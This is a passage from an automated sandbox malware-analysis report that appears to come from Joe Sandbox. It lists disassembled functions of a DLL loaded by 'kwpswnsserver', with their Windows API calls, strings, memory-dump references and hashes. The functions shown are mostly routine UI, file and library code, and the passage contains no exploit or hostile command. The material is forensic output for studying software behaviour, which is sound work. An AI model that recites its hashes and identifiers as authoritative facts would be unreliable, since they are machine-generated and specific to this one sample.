                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: AddressHandleModuleProc
                                                                  • String ID: Advapi32.dll$RegOpenKeyTransactedW
                                                                  • API String ID: 1646373207-3913318428
                                                                  • Opcode ID: c994f47e93b0ddbb781a47e42b5c9bae8973df101656e8fbe894642e161fb4e3
                                                                  • Instruction ID: 5dc0631216de4c2aec41eb894cbfb8700239f6d23b13b3cc53ea12b11fbce1a1
                                                                  • Opcode Fuzzy Hash: c994f47e93b0ddbb781a47e42b5c9bae8973df101656e8fbe894642e161fb4e3
                                                                  • Instruction Fuzzy Hash: 4FF0AF3270021AAFCB222E98DD08B967BA5FB85359F108825F515C2410D771C852DBA4
                                                                  Function 6C8F9C56 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?,?,6C8FA022,?,00000000,?,00000024), ref: 6C8F9C6D
                                                                  • GetProcAddress.KERNEL32(00000000,GetFileAttributesTransactedW), ref: 6C8F9C7D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: AddressHandleModuleProc
                                                                  • String ID: GetFileAttributesTransactedW$kernel32.dll
                                                                  • API String ID: 1646373207-1378992308
                                                                  • Opcode ID: 1887fff1151f829808b101c08c25d8f9ff51b050e2d5fd87be86f050618b2ccb
                                                                  • Instruction ID: 5c4f0f9e715a9ee9b9fdcda5f6bd76d1619fc2087062dfcfe23a24232bea2844
                                                                  • Opcode Fuzzy Hash: 1887fff1151f829808b101c08c25d8f9ff51b050e2d5fd87be86f050618b2ccb
                                                                  • Instruction Fuzzy Hash: 62F0963120231AEFEF215F55DE7876677E4FF042A9F114929E524C1950C7728552C750
                                                                  Function 6C8F88CE Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • swprintf.LIBCMT ref: 6C8F88F8
                                                                  • GetFileAttributesW.KERNEL32(00000104,AFX,00000000,00000104,00000104,000000FF), ref: 6C8F8903
                                                                  • GetTempFileNameW.KERNEL32(000000FF,00000104,00000000,00000104,?,?,6C8D1569,?,AFX,00000000,00000104,00000104,000000FF), ref: 6C8F891B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: File$AttributesNameTempswprintf
                                                                  • String ID: %s%s%X.tmp
                                                                  • API String ID: 2659213859-596088238
                                                                  • Opcode ID: 9b08999c079afce679f1b8d011ce4bbff6e2ab70e22c9eab5af71d55cbc64e56
                                                                  • Instruction ID: 7c19977d592b8d255daed5218222f7ca5f3a05a26a472a0a0fe7d2c2d21a4970
                                                                  • Opcode Fuzzy Hash: 9b08999c079afce679f1b8d011ce4bbff6e2ab70e22c9eab5af71d55cbc64e56
                                                                  • Instruction Fuzzy Hash: A4F0583250020EFBCF119F91CD05ACE3B76FF05368F108A10FA24A08A1D732D661AB90
                                                                  Function 6C89C0E5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 22COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 6C851ED0: GetLastError.KERNEL32 ref: 6C851F1F
                                                                  • IsDebuggerPresent.KERNEL32(?,?,?,6C87F8D3), ref: 6C89C118
                                                                  • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,6C87F8D3), ref: 6C89C127
                                                                  Strings
                                                                  • MZx, xrefs: 6C89C0ED
                                                                  • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 6C89C122
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: DebugDebuggerErrorLastOutputPresentString
                                                                  • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule$MZx
                                                                  • API String ID: 389471666-1466369552
                                                                  • Opcode ID: 6eeb2d9952345dd6c0d0d6e9dc751d5ca6fa79fbcefbad38116806d3807ab36b
                                                                  • Instruction ID: 701f11fc382e01cd419e165229acd3d8dda5d0c2c2d7d732a54fc5c82bc30515
                                                                  • Opcode Fuzzy Hash: 6eeb2d9952345dd6c0d0d6e9dc751d5ca6fa79fbcefbad38116806d3807ab36b
                                                                  • Instruction Fuzzy Hash: 8DE039712017218EDB71AF69DA183427AF0AB05248F40CD6DD89AC6B01E7B5D449CBA1
                                                                  Function 6C8CCE3D Relevance: 6.4, APIs: 4, Instructions: 380windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetBkColor.GDI32(?), ref: 6C8CCE7E
                                                                  • GetTextColor.GDI32(?), ref: 6C8CCF2A
                                                                  • GetBkColor.GDI32(?), ref: 6C8CD11C
                                                                  • DrawIconEx.USER32(?,?,?,?,?,?,00000000,00000000,00000003), ref: 6C8CD235
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Color$DrawIconText
                                                                  • String ID:
                                                                  • API String ID: 2759393849-0
                                                                  • Opcode ID: 45e13da35ad61879de7650db7bc7efdb20941d57d345b3cc5462022e04b031a1
                                                                  • Instruction ID: ef57382dc01ef3fca23ce06c23f85dbbd7d9dfa999e5559b8647e8462d1e7ba4
                                                                  • Opcode Fuzzy Hash: 45e13da35ad61879de7650db7bc7efdb20941d57d345b3cc5462022e04b031a1
                                                                  • Instruction Fuzzy Hash: DAE17A31B00219DFCF14DFA8CA84A9EBBB6BF49318F154569E815AB790D770ED06CB90
                                                                  Function 6C9E1CA4 Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetConsoleOutputCP.KERNEL32(E343E0B4,00000000,00000000,?), ref: 6C9E1D07
                                                                    • Part of subcall function 6C9D9411: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6C9DCBF9,?,00000000,-00000008), ref: 6C9D9472
                                                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 6C9E1F59
                                                                  • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6C9E1F9F
                                                                  • GetLastError.KERNEL32 ref: 6C9E2042
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                  • String ID:
                                                                  • API String ID: 2112829910-0
                                                                  • Opcode ID: a19f5e4f043f6755a3acd05ca3d5258df913e19bcc1b509f14b2455b463c09dd
                                                                  • Instruction ID: 021938381b49f0deb53a2f7523a2905f1e6532ccd41b7f2c0481bc89a4edb333
                                                                  • Opcode Fuzzy Hash: a19f5e4f043f6755a3acd05ca3d5258df913e19bcc1b509f14b2455b463c09dd
                                                                  • Instruction Fuzzy Hash: E1D18971E006599FCB06CFA8C880AEDBBB9FF1E304F14852AE465AB751D730E942CB50
                                                                  Function 6C95859B Relevance: 6.3, APIs: 4, Instructions: 257COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • InflateRect.USER32(?,00000001,00000005), ref: 6C95861C
                                                                  • DrawThemeBackground.UXTHEME(?,00000000,00000001,00000000,?,00000000), ref: 6C958637
                                                                  • InflateRect.USER32(?,00000000,?), ref: 6C9586DB
                                                                  • InflateRect.USER32(?,?,00000000), ref: 6C958793
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: InflateRect$BackgroundDrawTheme
                                                                  • String ID:
                                                                  • API String ID: 4162303385-0
                                                                  • Opcode ID: 9317611e2fd80f5e3abfdab586e1645f7ec2dde8621238701897c4e9802d65d1
                                                                  • Instruction ID: 59c071ffb6d3603bfb5ad022866d5fec495036c2aa04a3ecb4fb8905d7537b08
                                                                  • Opcode Fuzzy Hash: 9317611e2fd80f5e3abfdab586e1645f7ec2dde8621238701897c4e9802d65d1
                                                                  • Instruction Fuzzy Hash: F3816075A1120AAFCB18DEB8CD44DEF77ADEB89204B044939F911E7740DB34ED198BA0
                                                                  Function 6C8C00FC Relevance: 6.2, APIs: 4, Instructions: 250windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog3_GS.LIBCMT ref: 6C8C0106
                                                                  • GetMenuItemCount.USER32(?), ref: 6C8C01C6
                                                                  • GetMenuItemID.USER32(?,00000000), ref: 6C8C01E6
                                                                  • GetSubMenu.USER32(?,00000000), ref: 6C8C0305
                                                                    • Part of subcall function 6C8ADC3B: __EH_prolog3.LIBCMT ref: 6C8ADC42
                                                                    • Part of subcall function 6C8ADC3B: SetRectEmpty.USER32(?), ref: 6C8ADDFB
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Menu$Item$CountEmptyH_prolog3H_prolog3_Rect
                                                                  • String ID:
                                                                  • API String ID: 2186202558-0
                                                                  • Opcode ID: 2dd0d2b12426f0780fefba084d248269ac491053d131baa978257cc6410591b0
                                                                  • Instruction ID: 951db15f1789d9138e108cb3126a0155460c8649c70bb9e30df157d03f000656
                                                                  • Opcode Fuzzy Hash: 2dd0d2b12426f0780fefba084d248269ac491053d131baa978257cc6410591b0
                                                                  • Instruction Fuzzy Hash: 64A1A170B002299BCF24DF68CD54BDEB7B5AF45318F1046A9E42AAB790DB319E45CF41
                                                                  Function 6C8A3C2B Relevance: 6.2, APIs: 4, Instructions: 228COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • IsThemeBackgroundPartiallyTransparent.UXTHEME(?,00000006,00000000,6C9FDE40), ref: 6C8A3D19
                                                                  • DrawThemeParentBackground.UXTHEME(?,?,00000000), ref: 6C8A3D33
                                                                  • DrawThemeBackground.UXTHEME(?,?,00000006,00000000,00000000,00000000), ref: 6C8A3D4F
                                                                  • GetBkColor.GDI32(?), ref: 6C8A3D61
                                                                    • Part of subcall function 6C8A0C31: SetBkColor.GDI32(?,?), ref: 6C8A0C4A
                                                                    • Part of subcall function 6C8A0C31: ExtTextOutW.GDI32(?,00000000,00000000,00000002,00000000,00000000,00000000,00000000), ref: 6C8A0C7C
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: BackgroundTheme$ColorDraw$ParentPartiallyTextTransparent
                                                                  • String ID:
                                                                  • API String ID: 501873518-0
                                                                  • Opcode ID: ed6e0f4cd0b83dcbd02583323790ac25de79dd64e7a0702494521c9ff1860e8f
                                                                  • Instruction ID: 9182ed010ba638ac9defbf67ab24885c41c1c7f5bf9fe805009e4ae1dee9f61d
                                                                  • Opcode Fuzzy Hash: ed6e0f4cd0b83dcbd02583323790ac25de79dd64e7a0702494521c9ff1860e8f
                                                                  • Instruction Fuzzy Hash: BA914735E01219EFDF21CF98C984BEEBBB6AF49714F108525E915BB690C7719C42CBA0
                                                                  Function 6C904639 Relevance: 6.2, APIs: 4, Instructions: 177COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 6C904640
                                                                  • LoadImageW.USER32(?,?,00000000,00000000,00000000,00002000), ref: 6C904796
                                                                  • GetObjectW.GDI32(00000000,00000018,?), ref: 6C9047A8
                                                                  • DeleteObject.GDI32(00000000), ref: 6C904800
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Object$DeleteH_prolog3ImageLoad
                                                                  • String ID:
                                                                  • API String ID: 91933946-0
                                                                  • Opcode ID: 1cc8ae63d01ff4afcbe222aaabba482d30033dbc2969017ec2b8ad79f7530895
                                                                  • Instruction ID: ac2f57e8e160c681970591b315e457e79dd2b781d8b35f76578bf31b520b5aee
                                                                  • Opcode Fuzzy Hash: 1cc8ae63d01ff4afcbe222aaabba482d30033dbc2969017ec2b8ad79f7530895
                                                                  • Instruction Fuzzy Hash: B161CF31A016158BDF15CF68C9807EE73B9BF66304F2086ADEC15AB685DB70D985CFA0
                                                                  Function 6C9D8686 Relevance: 6.2, APIs: 4, Instructions: 168COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: AdjustPointer
                                                                  • String ID:
                                                                  • API String ID: 1740715915-0
                                                                  • Opcode ID: a7bb5830e554ff59cbec304c65f3f04bed7864650743a07fd9f01e5c1cadbfc0
                                                                  • Instruction ID: 5f666f46357b89693ed89849f30530424a35a423e957cbdb304d6d103710161f
                                                                  • Opcode Fuzzy Hash: a7bb5830e554ff59cbec304c65f3f04bed7864650743a07fd9f01e5c1cadbfc0
                                                                  • Instruction Fuzzy Hash: 92513732601A06AFDB1C8F14C940BAA73B9FF50B18F21952FE81567A92E731F840C7D9
                                                                  Function 6C954710 Relevance: 6.1, APIs: 4, Instructions: 145COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • FillRect.USER32(550018C2,?,?), ref: 6C954746
                                                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 6C954754
                                                                  • InflateRect.USER32(?,000000FE,000000FE), ref: 6C9547D5
                                                                  • FillRect.USER32(550018C2,?,?), ref: 6C954852
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Rect$FillInflate
                                                                  • String ID:
                                                                  • API String ID: 3595577067-0
                                                                  • Opcode ID: 51248780d005bd2ea5eb971ab5befcc092c92fd235b3eb04d4aaa593a05f0594
                                                                  • Instruction ID: 68d1bd2bde46acfea0ac1145dfd58081423f75d6c2579e90d6deac5c16635cbb
                                                                  • Opcode Fuzzy Hash: 51248780d005bd2ea5eb971ab5befcc092c92fd235b3eb04d4aaa593a05f0594
                                                                  • Instruction Fuzzy Hash: 57515C75A0061ADFCF04DF68C8549AE7BB9FF49314B548269E816EB340DB30EA16CF90
                                                                  Function 6C9E042C Relevance: 6.1, APIs: 4, Instructions: 137COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8e09b6b8a27755e598a4975d0d70650039c2b7c650b968b88065e3a7b0c9055b
                                                                  • Instruction ID: 7b0416d8a42d2ea36da86b6c9ea677cd0ec7d9570b3dcc8576bf3b7a836422c3
                                                                  • Opcode Fuzzy Hash: 8e09b6b8a27755e598a4975d0d70650039c2b7c650b968b88065e3a7b0c9055b
                                                                  • Instruction Fuzzy Hash: D74129B2A00744AFD7118F79C801B9ABBACEFB9714F10552AE0419BB80DF71D940D780
                                                                  Function 6C8BE2E0 Relevance: 6.1, APIs: 4, Instructions: 130COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: EmptyRect
                                                                  • String ID:
                                                                  • API String ID: 2270935405-0
                                                                  • Opcode ID: 48597bcd0ba2e2ddb5d84a1481e88fcdcb8e80422218bbcaffa98639de195d76
                                                                  • Instruction ID: f9a38d487b100a7395b09499660ac8a4b8ca48ce9018d8b504c3432d45aa3bb4
                                                                  • Opcode Fuzzy Hash: 48597bcd0ba2e2ddb5d84a1481e88fcdcb8e80422218bbcaffa98639de195d76
                                                                  • Instruction Fuzzy Hash: D151E8B09116268FCB648F19C5846E63BA8BF09B55F0846BBED0CCEB4AC7B05145DFE1
                                                                  Function 6C89A7A4 Relevance: 6.1, APIs: 4, Instructions: 117registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetPrivateProfileStringW.KERNEL32(?,?,6CA37FF0,?,00001000,?), ref: 6C89A8F1
                                                                    • Part of subcall function 6C89AC99: RegCloseKey.ADVAPI32(00000000,?,?,?,?,6C89A6C8,?,00000000), ref: 6C89ACDE
